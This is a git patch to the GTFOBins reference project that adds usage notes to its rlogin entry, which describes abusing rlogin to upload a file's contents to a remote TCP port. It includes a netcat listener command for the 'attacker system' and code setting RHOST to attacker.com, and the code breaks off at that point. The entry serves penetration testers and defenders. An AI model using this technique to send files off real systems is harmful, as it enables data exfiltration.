From 9652aee337b03724a4e1563c0aada828a40c499c Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 31 Dec 2018 13:31:46 +0100 Subject: [PATCH] Add comments to rlogin Close #45. --- _gtfobins/rlogin.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/_gtfobins/rlogin.md b/_gtfobins/rlogin.md index 5b1d393..8e17f30 100644 --- a/_gtfobins/rlogin.md +++ b/_gtfobins/rlogin.md @@ -1,7 +1,14 @@ --- +description: | + Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package). functions: file-upload: - - description: Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + - description: | + Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. + + `rlogin` hangs waiting for the remote peer to close the socket. + + The file is corrupted by leading and trailing spurious data. code: | RHOST=attacker.com RPORT=12345